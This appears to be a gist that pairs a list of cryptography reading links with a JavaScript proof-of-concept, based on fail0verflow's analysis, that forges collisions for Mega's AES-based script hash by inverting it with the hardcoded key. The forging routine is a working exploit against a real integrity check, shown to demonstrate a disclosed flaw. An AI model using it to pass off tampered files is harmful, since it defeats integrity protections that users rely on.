- RSA and padding oracle attack with very good examples another
- Cryptographic doom principle
- Static IV is bad
- http://crypto.stackexchange.com/
- http://blog.cryptographyengineering.com/2012/10/the-crypto-dream.html
- http://sourceforge.net/projects/evercrack/
- http://www.snikt.net/blog/2012/12/02/howto-encrypt-harddrive/
- Homographic cryptography
- https://factorable.net/
- Real World Crypto 2013
- https://polarssl.org
- Pond is not email. Pond is forward secure, asynchronous messaging for the discerning gentleman
- Perfect forward secrecy with PGP RFC
- Tor vs I2P
- http://blog.spiderlabs.com/2013/01/defeating-aes-without-a-phd.html
- https://defuse.ca/truecrypt-plausible-deniability-useless-by-game-theory.htm
- https://github.com/ssllabs/research/wiki
- This page contains my godzilla crypto tutorial, totalling 973 slides in 12 parts
- http://www.cs.berkeley.edu/~daw/teaching/cs261-f12/misc/if.html
- https://code.google.com/p/bletchley/source/checkout
- http://www.stat.fsu.edu/pub/diehard/
- http://ekaia.org/blog/2009/05/10/creating-new-gpgkey/
- http://www.cryptovirology.com/
- http://nullprogram.com/blog/2012/06/24/
- http://www.cs.rit.edu/~ib/Classes/CS482-705_Winter10-11/Slides/
- If You're Typing The Letters A-E-S Into Your Code, You're Doing It Wrong
Last active
October 11, 2015 07:47
CRYPTO
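// http://fail0verflow.com/blog/2013/megafail.html
/**
 * Mega's standard hash function, reproduced here for analysis.
 *
 * The input is padded with 15 'X' characters and then cut down to a whole
 * number of 16-character blocks. Blocks are consumed from the END of the
 * string towards the start: each block is XORed into a four-word state
 * (big-endian inside each 32-bit word) and the state is then AES-encrypted.
 *
 * Security note: the AES key is a constant embedded in the code, so anyone
 * holding the script can run the decryption direction too. The output is
 * therefore a checksum, not a collision- or preimage-resistant digest, and
 * must not be relied on for integrity decisions; a real hash function such
 * as SHA-256 is the appropriate primitive for that.
 *
 * Caveat: characters are folded in via charCodeAt() without masking, so code
 * units above 0xff spill into neighbouring byte positions of the word.
 *
 * @param {string} s - Data to hash, one character per byte.
 * @returns {number[]} Four signed 32-bit words.
 */
function h(s)
{
    var state = [0, 0, 0, 0];
    var aes = new sjcl.cipher.aes([111111, 222222, 333333, 444444]);
    // Array(16).join('X') is 15 'X' characters: enough to complete the last
    // partial block; the "& -16" below drops whatever padding is left over.
    var padded = s + Array(16).join('X');
    var i = padded.length & -16;
    var lane;
    var shift;

    while (i-- > 0)
    {
        lane = (i >> 2) & 3;          // which 32-bit word this character lands in
        shift = ((7 - i) & 3) << 3;   // 24, 16, 8, 0: big-endian byte position
        state[lane] ^= padded.charCodeAt(i) << shift;
        // i is a multiple of 16: a whole block has been absorbed.
        if ((i & 15) === 0) state = aes.encrypt(state);
    }
    return state;
}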
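/**
 * The reverse hash function, used to backtrack across data.
 *
 * Walks s forwards, decrypting the state at the start of every 16-character
 * block and then XORing the block back out, i.e. the steps of h() in the
 * opposite order. For a string whose length is a multiple of 16:
 *
 *     reverse_h(s, h(s)) == [0,0,0,0]
 *
 * That this function can be written at all is the weakness being shown: with
 * the AES key fixed in the source, the chaining of h() is invertible by
 * anyone, so h() gives no integrity guarantee.
 *
 * No padding is applied here; the caller passes already block-aligned data.
 * When s is empty the array passed as a is returned untouched.
 *
 * @param {string} s - Block-aligned data, one character per byte.
 * @param {number[]} a - Four-word state to unwind from.
 * @returns {number[]} The state that precedes s in the chain.
 */
function reverse_h(s,a)
{
    var aes = new sjcl.cipher.aes([111111, 222222, 333333, 444444]);
    var state = a;
    var lane;
    var shift;
    var i;

    for (i = 0; i < s.length; i++)
    {
        // Block boundary: undo the encryption h() applied after this block.
        if ((i & 15) === 0) state = aes.decrypt(state);
        lane = (i >> 2) & 3;
        shift = ((7 - i) & 3) << 3;   // same big-endian packing as h()
        state[lane] ^= s.charCodeAt(i) << shift;
    }
    return state;
}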
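// The hash value that we want to forge. Starts as all zeroes and is replaced
// with h(file contents) once a file has been selected on the page.
// Declared explicitly: a bare assignment creates an implicit global and
// throws a ReferenceError in strict mode or in an ES module.
var g_hash = [0, 0, 0, 0];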
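// Page wiring for the demonstration. Relies on jQuery ($), sjcl, and on h(),
// reverse_h() and g_hash defined earlier in this file.
$(document).ready(function () {
    // Just fetches the file from disk and computes the standard Mega hash.
    // NOTE: readAsText() decodes the file as text, so h() sees UTF-16 code
    // units rather than raw bytes; the two only coincide for ASCII content.
    $("#file").change(function () {
        var binaryReader;
        if (this.files.length > 0) {
            binaryReader = new FileReader();
            binaryReader.onload = function () {
                g_hash = h(binaryReader.result);
                $("#hash").text("[" + g_hash.join(",") + "]");
            };
            binaryReader.readAsText(this.files[0]);
        }
    });

    // Computes the forged file
    $("#forge").click(function () {
        // Initialize the AES engine
        var aes = new sjcl.cipher.aes([111111, 222222, 333333, 444444]);
        var head;
        var headhash;
        var tail;
        var tailhash;
        var collision;
        var xor;
        var data;
        var h2;
        var uri;
        var i; // declared locally; the loop below used to leak a global i

        // Append JS-friendly padding such that the file is a multiple of
        // 16 bytes long and ends in "\n/*" (yes, this could be simplified
        // by merging the two comments, but whatever).
        head = $("#forgedfile").text() + "\n//XXX";
        head += Array(16).join('X');
        head = head.slice(0, (head.length & -16) - 3);
        head += "\n/*";

        // Reverse the MAC to compute the intermediate MAC value for the
        // head of the file, such that the final MAC value is what we want.
        // (the head of the file is the tail of the hash data, since the MAC
        // runs backwards). Decrypt it one last time; this decryption
        // corresponds to the encryption performed at the end of the collision
        // block (see below).
        headhash = aes.decrypt(reverse_h(head, g_hash));

        // Create and MAC normally the last block in the file. This is just
        // "*/\n" plus the standard XXXXX padding applied by h()
        tail = "*/\n";
        tailhash = h(tail);

        // Finally, given one intermediate MAC value and what we want the next
        // MAC value to be, just XOR them together to find the block that we
        // need to insert.
        collision = "";
        for (i = 0; i < 16; i++) {
            xor = headhash[i >> 2] ^ tailhash[i >> 2];
            // Unpack big-endian, mirroring how h() packs characters into words.
            collision += String.fromCharCode((xor >> (((3 - i) & 3) << 3)) & 0xff);
        }

        // Append everything together to form the new file
        data = head + collision + tail;

        // Double check that the collision worked. Both sides are arrays of
        // 32-bit integers, so strict equality is the right comparison.
        h2 = h(data);
        if (g_hash[0] === h2[0] && g_hash[1] === h2[1] &&
            g_hash[2] === h2[2] && g_hash[3] === h2[3]) {
            alert("Collision successful, hash value matches!");
            uri = "data:application/octet-stream," + encodeURIComponent(data);
            window.open(uri, 'Your forged file');
        } else {
            alert("Collision failed! Got " + h2.join(","));
        }
    });
});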